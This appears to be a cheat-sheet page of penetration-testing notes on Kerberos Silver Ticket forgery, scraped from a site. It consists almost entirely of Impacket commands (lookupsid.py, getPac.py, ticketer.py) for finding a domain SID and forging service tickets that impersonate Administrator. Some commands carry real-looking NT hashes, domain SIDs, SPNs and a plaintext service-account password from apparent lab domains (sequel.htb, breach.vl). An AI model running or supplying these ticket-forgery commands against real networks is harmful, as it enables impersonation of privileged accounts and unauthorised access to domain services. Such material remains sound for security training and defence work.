Silver Ticket
Theory
Unix
# Find the domain SID
lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0
getPac.py sequel.htb/sql_svc:REGGIE1234ronnie -targetUser Administrator
# with an NT hash
python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username_to_impersonate
python ticketer.py -nthash 1443ec19da4dac4ffc953bca1b57b4cf -domain-sid S-1-5-21-4078382237-1492182817-2568127209 -domain sequel.htb -spn Hahahah/dc.sequel.htb Administrator
# With svc_mssql account kerberos ticket imported.
# https://codebeautify.org/ntlm-hash-generator to covert password to NTLM hash
ticketer.py \
-nthash 69596C7AA1E8DAEE17F8E78870E25A5C \
-domain-sid S-1-5-21-2330692793-3312915120-706255856 \
-domain breach.vl \
-dc-ip BREACHDC.breach.vl \
-spn 'MSSQLSvc/breachdc.breach.vl:1433' Administrator
# with an AES (128 or 256 bits) key
python ticketer.py -aesKey $AESkey -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username_to_impersonateWindows
Last updated